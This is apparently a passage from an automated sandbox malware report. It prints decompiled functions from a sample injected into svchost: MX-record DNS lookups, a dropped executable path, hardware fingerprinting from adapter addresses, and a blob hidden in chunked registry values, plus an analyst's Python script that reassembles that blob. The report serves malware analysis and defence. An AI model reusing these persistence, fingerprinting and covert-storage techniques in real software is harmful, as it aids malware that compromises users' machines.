                                                                                                                                  					_t20 = GetProcAddress(_t19, "DnsQuery_A");
                                                                                                                                  					if(_t20 == _t39) {
                                                                                                                                  						L2:
                                                                                                                                  						return 0;
                                                                                                                                  					}
                                                                                                                                  					_t35 =  &_v16;
                                                                                                                                  					_t22 =  *_t20(_a4, 0xf, _t39, _t39,  &_v16, _t39); // executed
                                                                                                                                  					if(_t22 != 0) {
                                                                                                                                  						goto L2;
                                                                                                                                  					}
                                                                                                                                  					_t37 = _v16;
                                                                                                                                  					_v8 = _t39;
                                                                                                                                  					_v12 = _t39;
                                                                                                                                  					if(_t37 == _t39) {
                                                                                                                                  						L14:
                                                                                                                                  						return _v12;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108); // one 0x108-byte node per returned DNS record
						if(_t40 == 0) {
							break;
						}
						E0251EE2A(_t35, _t40, 0, 0x108); // zero the node (likely memset)
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff; // DNS_RECORD.Data.MX.wPreference (query type 0x0F = DNS_TYPE_MX)
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff); // DNS_RECORD.Data.MX.pNameExchange, copied into the node at +8
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40; // append to the singly linked list; _v12 holds the head
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37; // DNS_RECORD.pNext
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28); // stack-built library name; the report's strings list dnsapi.dll
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}


APIs
• GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,02512F01,?,025120FF,02522000), ref: 02512D3A
• LoadLibraryA.KERNEL32(?), ref: 02512D4A
• GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02512D61
• DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 02512D77
• GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 02512D99
• HeapAlloc.KERNEL32(00000000), ref: 02512DA0
• lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 02512DCB
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
• String ID: DnsQuery_A$dnsapi.dll
• API String ID: 233223969-3847274415
• Opcode ID: d4b39545a231d987391218a2ad8d82557b2848b1734b648298a6d11b7ee796dd
• Instruction ID: 14d6d940f694e6f9b8b847ce061379e2d3c797c41037b6e6ef74985bb758e164
• Opcode Fuzzy Hash: d4b39545a231d987391218a2ad8d82557b2848b1734b648298a6d11b7ee796dd
• Instruction Fuzzy Hash: 84219071D41236ABEB219F54DC48AAEBFB8FF19B50F014416F805E3180D370998A8BD8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[control-flow graph of E025180C9 (entry 0x025180c9): node/edge dump from the report's graph widget omitted; its API nodes are RegOpenKeyExA, RegQueryValueExA and RegCloseKey, the rest are internal routines]
C-Code - Quality: 93%
			E025180C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x2522c3c = 0;
				 *0x2522c38 = 0;
				if(E02516EC3() != 0) {
					_t27 = E0251704C(0x2520264, 0, 0,  &_v312,  &_v52); // fills _v312 (used below as the registry value name) and _v52
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8); // builds the key path in the buffer at 0x25222f8
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) { // HKEY_CURRENT_USER, KEY_QUERY_VALUE | KEY_WOW64_64KEY
							L19:
							E0251EE2A(_t56, 0x25222f8, 0, 0x100); // clear the key-path buffer (likely memset)
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) { // size probe; requires type REG_SZ (1) and a non-empty value
							L15:
							_t42 =  *0x2522c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0251EC2E(_t42); // free the value buffer
							 *0x2522c3c = 0;
							goto L17;
						} else {
							_t45 = E0251EBCC(_v8); // allocate _v8 bytes for the value data
							_pop(_t56);
							 *0x2522c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) { // second call reads the data into _t45
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do { // inline strlen of the value name
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0251EBCC(_t49 - _t60 + 1); // strlen + 1
							_pop(_t56);
							 *0x2522c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0251EF00(_t52,  &_v312); // keep a heap copy of the value name (likely strcpy)
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E02517EE6(_t56); // executed
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x25221a4; // 0x47a00
						if(_t71 == 0) {
							_t31 = E0251675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0); // executed; returns a buffer (_t31) and fills _v20
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x25222d4 = E025124C2(_t61, _t63, 0); // consumes the buffer and its _v20 value, result cached globally
								 *0x25221a4 = _t63;
								E0251EC2E(_t61); // free the buffer
							}
						}
					}
					return 1;
				}
			}
                                                                                                                                  0x025180c9
                                                                                                                                  0x025180d7
                                                                                                                                  0x025180da
                                                                                                                                  0x025180e0
                                                                                                                                  0x025180ed
                                                                                                                                  0x0251810b
                                                                                                                                  0x02518110
                                                                                                                                  0x02518115
                                                                                                                                  0x00000000
                                                                                                                                  0x02518130
                                                                                                                                  0x02518151
                                                                                                                                  0x02518156
                                                                                                                                  0x02518167
                                                                                                                                  0x02518216
                                                                                                                                  0x0251821d
                                                                                                                                  0x02518222
                                                                                                                                  0x00000000
                                                                                                                                  0x02518222
                                                                                                                                  0x0251818b
                                                                                                                                  0x025181f7
                                                                                                                                  0x025181f7
                                                                                                                                  0x025181fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518201
                                                                                                                                  0x02518206
                                                                                                                                  0x00000000
                                                                                                                                  0x02518198
                                                                                                                                  0x0251819b
                                                                                                                                  0x025181a0
                                                                                                                                  0x025181a1
                                                                                                                                  0x025181a8
                                                                                                                                  0x0251820d
                                                                                                                                  0x02518210
                                                                                                                                  0x00000000
                                                                                                                                  0x02518210
                                                                                                                                  0x025181aa
                                                                                                                                  0x025181c2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025181c4
                                                                                                                                  0x025181ca
                                                                                                                                  0x025181cd
                                                                                                                                  0x025181cd
                                                                                                                                  0x025181cf
                                                                                                                                  0x025181d0
                                                                                                                                  0x025181d8
                                                                                                                                  0x025181dd
                                                                                                                                  0x025181de
                                                                                                                                  0x025181e5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025181ef
                                                                                                                                  0x0251820c
                                                                                                                                  0x0251820c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251820c
                                                                                                                                  0x0251818b
                                                                                                                                  0x025180ef
                                                                                                                                  0x025180ef
                                                                                                                                  0x02518225
                                                                                                                                  0x02518225
                                                                                                                                  0x0251822b
                                                                                                                                  0x0251822d
                                                                                                                                  0x02518233
                                                                                                                                  0x0251823f
                                                                                                                                  0x02518244
                                                                                                                                  0x0251824b
                                                                                                                                  0x0251824d
                                                                                                                                  0x02518259
                                                                                                                                  0x0251825e
                                                                                                                                  0x02518264
                                                                                                                                  0x02518269
                                                                                                                                  0x0251824b
                                                                                                                                  0x02518233
                                                                                                                                  0x02518273
                                                                                                                                  0x02518273

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0251815F
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0251A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 02518187
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0251A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 025181BE
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 02518210
                                                                                                                                    • Part of subcall function 0251675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0251677E
                                                                                                                                    • Part of subcall function 0251675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0251679A
                                                                                                                                    • Part of subcall function 0251675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 025167B0
                                                                                                                                    • Part of subcall function 0251675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 025167BF
                                                                                                                                    • Part of subcall function 0251675C: GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 025167D3
                                                                                                                                    • Part of subcall function 0251675C: ReadFile.KERNEL32(000000FF,?,00000040,02518244,00000000,?,761B43E0,00000000), ref: 02516807
                                                                                                                                    • Part of subcall function 0251675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251681F
                                                                                                                                    • Part of subcall function 0251675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0251683E
                                                                                                                                    • Part of subcall function 0251675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251685C
                                                                                                                                    • Part of subcall function 0251EC2E: GetProcessHeap.KERNEL32(00000000,0251EA27,00000000,0251EA27,00000000), ref: 0251EC41
                                                                                                                                    • Part of subcall function 0251EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0251EC48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
                                                                                                                                  • API String ID: 124786226-910841113
                                                                                                                                  • Opcode ID: 195131aeb19afff00c017e9814796cbf1945ed05e28201348bd694665c207d31
                                                                                                                                  • Instruction ID: 54303bda8f6a70231a2e99a796cb41f19b9405e9e69fb57d7e8fcb83c8db141e
                                                                                                                                  • Opcode Fuzzy Hash: 195131aeb19afff00c017e9814796cbf1945ed05e28201348bd694665c207d31
                                                                                                                                  • Instruction Fuzzy Hash: AD41A3B2C41119BFFB25AFA0DC85DBE7B6DBB05304F100866E911E3080E7309A48DB5C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1301 2511ac3-2511adc LoadLibraryA 1302 2511ae2-2511af3 GetProcAddress 1301->1302 1303 2511b6b-2511b70 1301->1303 1304 2511af5-2511b01 1302->1304 1305 2511b6a 1302->1305 1306 2511b1c-2511b27 GetAdaptersAddresses 1304->1306 1305->1303 1307 2511b03-2511b12 call 251ebed 1306->1307 1308 2511b29-2511b2b 1306->1308 1307->1308 1317 2511b14-2511b1b 1307->1317 1310 2511b5b-2511b5e 1308->1310 1311 2511b2d-2511b32 1308->1311 1314 2511b69 1310->1314 1315 2511b60-2511b68 call 251ec2e 1310->1315 1313 2511b34-2511b3b 1311->1313 1311->1314 1318 2511b54-2511b59 1313->1318 1319 2511b3d-2511b52 1313->1319 1314->1305 1315->1314 1317->1306 1318->1310 1318->1313 1319->1318 1319->1319
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E02511AC3() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				struct HINSTANCE__* _t19;
                                                                                                                                  				void* _t23;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				void* _t41;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_t19 = LoadLibraryA("Iphlpapi.dll");
                                                                                                                                  				if(_t19 == 0) {
                                                                                                                                  					L15:
                                                                                                                                  					return _v16;
                                                                                                                                  				}
                                                                                                                                  				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
                                                                                                                                  				if(_t28 == 0) {
                                                                                                                                  					L14:
                                                                                                                                  					goto L15;
                                                                                                                                  				}
                                                                                                                                  				_push( &_v12);
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_push(0);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t23 =  *_t28(2, 0, 0); // executed
                                                                                                                                  					_t41 = _t23;
                                                                                                                                  					if(_t41 != 0x6f) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t24 = E0251EBED(_v8, _v12);
                                                                                                                                  					if(_t24 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_push( &_v12);
                                                                                                                                  					_v8 = _t24;
                                                                                                                                  					_push(_t24);
                                                                                                                                  				}
                                                                                                                                  				if(_t41 != 0) {
                                                                                                                                  					L11:
                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                  						E0251EC2E(_v8);
                                                                                                                                  					}
                                                                                                                                  					L13:
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				_t26 = _v8;
                                                                                                                                  				if(_t26 == 0) {
                                                                                                                                  					goto L13;
                                                                                                                                  				} else {
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L8:
                                                                                                                                  					_t43 =  *((intOrPtr*)(_t26 + 0x34));
                                                                                                                                  					_t39 = 0;
                                                                                                                                  					if(_t43 <= 0) {
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						goto L9;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L9:
                                                                                                                                  						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
                                                                                                                                  						_t39 = _t39 + 1;
                                                                                                                                  					} while (_t39 < _t43);
                                                                                                                                  					L10:
                                                                                                                                  					_t26 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                  				} while (_t26 != 0);
                                                                                                                                  				goto L11;
                                                                                                                                  			}
Instruction address column for the listing above (0x02511ad1 - 0x02511b70, one address per decompiled line) not reproduced.

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 02511AD4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 02511AE9
                                                                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 02511B20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdaptersAddressAddressesLibraryLoadProc
                                                                                                                                  • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                                                                  • API String ID: 3646706440-1087626847
                                                                                                                                  • Opcode ID: 9cf71ec561401baf32848bbd3990e9135a7663cc07a97a3a683c26c10f326140
                                                                                                                                  • Instruction ID: 7b37e5788afd19b1db94644963ff462440fecad46e1250fa63d543a21cdd7f5f
                                                                                                                                  • Opcode Fuzzy Hash: 9cf71ec561401baf32848bbd3990e9135a7663cc07a97a3a683c26c10f326140
                                                                                                                                  • Instruction Fuzzy Hash: 2411DA71E02534AFEB159BA9DC85CEDBFB9FB44B10B158096E109A7140E7305A44DB9C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)

Basic blocks of E0251E3CA with their successors, as listed in the report:
• 1321: 251e3ca-251e3ee RegOpenKeyExA → 1322, 1323
• 1322: 251e3f4-251e3fb → 1324
• 1323: 251e528-251e52d (function exit)
• 1324: 251e3fe-251e403 → 1324 (self-loop, the inline strlen), 1325
• 1325: 251e405-251e40f → 1326, 1327
• 1326: 251e411-251e413 → 1327
• 1327: 251e414-251e452 call 251ee08, call 251f1ed, RegQueryValueExA → 1332, 1333
• 1332: 251e458-251e486 call 251f1ed, RegQueryValueExA → 1336
• 1333: 251e51d-251e527 RegCloseKey → 1323
• 1336: 251e488-251e48a → 1333, 1337
• 1337: 251e490-251e4a1 call 251db2e → 1333, 1340
• 1340: 251e4a3-251e4a6 → 1341
• 1341: 251e4a9-251e4d3 call 251f1ed, RegQueryValueExA → 1344, 1345
• 1344: 251e4d5-251e4da → 1345, 1346
• 1345: 251e4e8-251e4ea → 1333, 1347
• 1346: 251e4dc-251e4e6 → 1341, 1345
• 1347: 251e4ec-251e516 call 2512544, call 251e332 → 1333
                                                                                                                                  C-Code - Quality: 100%
			E0251E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				// Decompiler output. Explanatory comments and the three temporaries the
				// decompiler used without declaring (_t6, _t56, _t106) were added in editing;
				// the logic is unchanged.
				// _a4: registry hive/key handle, _a8: subkey path, _a12: value-name prefix.
				// Reads the consecutive values <prefix>0, <prefix>1, ... into one buffer and
				// hands it to E02512544 / E0251E332. Returns 1 on success, 0 otherwise.
				int* _v8;        // running value index, written in decimal after the prefix
				int _v12;        // pass 1: size out-param; pass 2: write cursor (decompiler types it as int)
				void* _v16;      // opened key handle
				intOrPtr _v20;   // address just after the copied prefix, where the index is written
				int _v24;        // value type out-param, not used
				int _v28;        // pass 2: cbData on input, bytes read on output
				int _v32;        // total blob size computed in pass 1
				int* _v36;       // return value: 0 = failure, 1 = success
				char _v68;       // start of a 32-byte value-name buffer: prefix (<= 0x1c bytes) + index
				long _t50;
				intOrPtr* _t52;
				intOrPtr* _t6;   // added declaration
				void* _t56;      // added declaration
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;
				int _t106;       // added declaration

				_t82 = __edx;
				_v36 = 0;
				// 0x20119 = KEY_READ | KEY_WOW64_64KEY: the 64-bit registry view is requested explicitly
				_t50 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16); // executed
				if(_t50 != 0) {
					L16:
					return _v36;
				}
				// Inline strlen(_a12); the length is capped at 0x1c so prefix plus index fits the name buffer
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x25228f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0251EE08( &_v68, _a12, _t85);   // memcpy-like copy of the prefix into the name buffer
				_t56 = _t91 + _t85 - 0x40;       // = &_v68[_t85], the byte right after the prefix
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0251F1ED(0, _t56, 0xa);         // itoa-like (value, buffer, base 10): yields "<prefix>0"
				_t93 = _t92 + 0x18;
				// Pass 1: query <prefix>0, <prefix>1, ... with a NULL data buffer to learn each value's size
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;           // accumulate the total size
						_v8 = _v8 + 1;
						_v12 = 0;
						E0251F1ED(_v8, _v20, 0xa);    // next value name
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0251DB2E(_t89);              // presumably an allocator: the result is read from the global at 0x25236c4 and NULL-checked
					_t69 =  *0x25236c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					// Pass 2: read the same values back to back. The remaining budget is passed as cbData,
					// so a value larger than expected fails (ERROR_MORE_DATA) and ends the loop.
					while(1) {
						_v28 = _t89;
						E0251F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {               // zero-length value: stop
							break;
						}
						_v12 =  &(_v12[_t78]);        // advance the write cursor by the bytes read
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					// Only a complete read (remaining == 0) is accepted; partial data is discarded
					if(_t89 == 0) {
						_t75 =  *0x25236c4; // 0x0
						E02512544(_t75, _t75, _v32, 0xe4, 0xc8);   // in-place transform of the buffer; 0xe4/0xc8 are its parameters, its algorithm is not in this listing
						E0251E332(_t82, _t106,  *0x25236c4, _v32); // consume the assembled blob
						_v36 = 1;
					}
					goto L15;
				}
			}
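The two-pass reassembly that E0251E3CA performs is worth having in a form an analyst can run against a registry dump. The block below is an added example written for this report; it is not code from the Joe Sandbox output or from the sample. It mirrors the decompiled logic: value names are the prefix (truncated to 0x1c bytes) followed by a decimal index (reading the E0251F1ED(index, buffer, 0xa) calls as an itoa-style base-10 conversion is an assumption), pass one sums the sizes of <prefix>0, <prefix>1, ... until a query fails, pass two reads them back to back with the remaining budget as cbData, and the result is accepted only when the two passes agree. The registry is abstracted as a lookup callable so the logic runs offline; FAKE_HIVE and the prefix "blob" are constructed test data, not values observed in the sample (the key and prefix the sample uses are the caller-supplied _a8 and _a12 and are not visible in this listing). The in-place transform done by E02512544 is not reproduced because its algorithm is not shown on the page.

```python
"""Reassemble a registry-chunked blob the way E0251E3CA does.

Added example for this report, not code from the sandbox output or the
sample.  FAKE_HIVE below is constructed test data.
"""
from typing import Callable, Optional

MAX_PREFIX = 0x1C  # E0251E3CA copies at most 0x1c bytes of the prefix

# A query callable takes a value name and returns the value's bytes,
# or None when the value does not exist (RegQueryValueExA failure).
QueryFn = Callable[[str], Optional[bytes]]


def value_name(prefix: str, index: int) -> str:
    """Mirror the name construction: truncated prefix + decimal index."""
    return prefix[:MAX_PREFIX] + str(index)


def reassemble(query: QueryFn, prefix: str) -> Optional[bytes]:
    """Two-pass reassembly mirroring E0251E3CA; None on any mismatch."""
    # Pass 1: sum the sizes of consecutive values prefix0, prefix1, ...
    total = 0
    count = 0
    while True:
        data = query(value_name(prefix, count))
        if data is None:
            break
        total += len(data)
        count += 1
    if total <= 0:  # no values at all, or only empty ones
        return None

    # Pass 2: read each value with the remaining budget as cbData.  A value
    # larger than the budget would make RegQueryValueExA return
    # ERROR_MORE_DATA; a missing or zero-length value also ends the loop.
    buf = bytearray()
    remaining = total
    index = 0
    while remaining > 0:
        data = query(value_name(prefix, index))
        if not data or len(data) > remaining:
            break
        buf += data
        remaining -= len(data)
        index += 1
    # Success only if the bytes read exactly cover the size counted earlier.
    return bytes(buf) if remaining == 0 else None


def winreg_query(hive: int, subkey: str) -> QueryFn:
    """Build a query callable over a live key (Windows only; assumed usage).

    Opens the key with KEY_READ | KEY_WOW64_64KEY, the 0x20119 access
    mask seen in the listing, so the same registry view is read.
    """
    import winreg  # imported here so the offline demo runs on any OS

    key = winreg.OpenKey(hive, subkey, 0,
                         winreg.KEY_READ | winreg.KEY_WOW64_64KEY)

    def query(name: str) -> Optional[bytes]:
        try:
            data, _kind = winreg.QueryValueEx(key, name)
        except FileNotFoundError:
            return None
        # Only binary values are meaningful for a chunked blob.
        return data if isinstance(data, bytes) else None

    return query


# Constructed sample data: three consecutive chunks plus an unrelated
# value that the consecutive-index walk must never reach.
FAKE_HIVE = {
    "blob0": b"\x01\x02\x03",
    "blob1": b"\x04\x05",
    "blob2": b"\x06",
    "blob4": b"\xff",   # blob3 is missing, so pass 1 stops before this
}

if __name__ == "__main__":
    print(reassemble(FAKE_HIVE.get, "blob").hex())
```

On an analysis VM the same function runs against the live registry with `reassemble(winreg_query(winreg.HKEY_CURRENT_USER, r"<subkey>"), "<prefix>")`, where subkey and prefix are whatever the caller of E0251E3CA passes; the output is the blob as stored, before whatever E02512544 does to it.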
Instruction address column for E0251E3CA (0x0251e3ca - 0x0251e52d, one address per decompiled line) not reproduced.
                                                                                                                                  0x0251e4a6
                                                                                                                                  0x0251e4a9
                                                                                                                                  0x0251e4ae
                                                                                                                                  0x0251e4b4
                                                                                                                                  0x0251e4b9
                                                                                                                                  0x0251e4d3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4d5
                                                                                                                                  0x0251e4da
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4dc
                                                                                                                                  0x0251e4df
                                                                                                                                  0x0251e4e1
                                                                                                                                  0x0251e4e6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4e6
                                                                                                                                  0x0251e4e8
                                                                                                                                  0x0251e4ea
                                                                                                                                  0x0251e4ec
                                                                                                                                  0x0251e500
                                                                                                                                  0x0251e50e
                                                                                                                                  0x0251e516
                                                                                                                                  0x0251e516
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4ea

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,0251E5F2,00000000,00020119,0251E5F2,025222F8), ref: 0251E3E6
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0251E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0251E44E
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0251E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0251E482
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0251E5F2,?,00000000,?,80000001,?), ref: 0251E4CF
                                                                                                                                  • RegCloseKey.ADVAPI32(0251E5F2,?,?,?,?,000000C8,000000E4), ref: 0251E520
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586453840-0
                                                                                                                                  • Opcode ID: 6c3f23f8c7cc8251648d8a9067d3e7c367e96ce090e790e158b5ea57fb46a652
                                                                                                                                  • Instruction ID: fa81407bace95c2f9ea06b1855ec53aa0f34cd26e64a559883100bf2dcab1cb9
                                                                                                                                  • Opcode Fuzzy Hash: 6c3f23f8c7cc8251648d8a9067d3e7c367e96ce090e790e158b5ea57fb46a652
                                                                                                                                  • Instruction Fuzzy Hash: 104138B2D0021EBFEF11AFD8DC85DEEBBBDFB48304F454466E900A2150E3719A599B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1352 251f26d-251f303 setsockopt * 5
                                                                                                                                  APIs
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0251F2A0
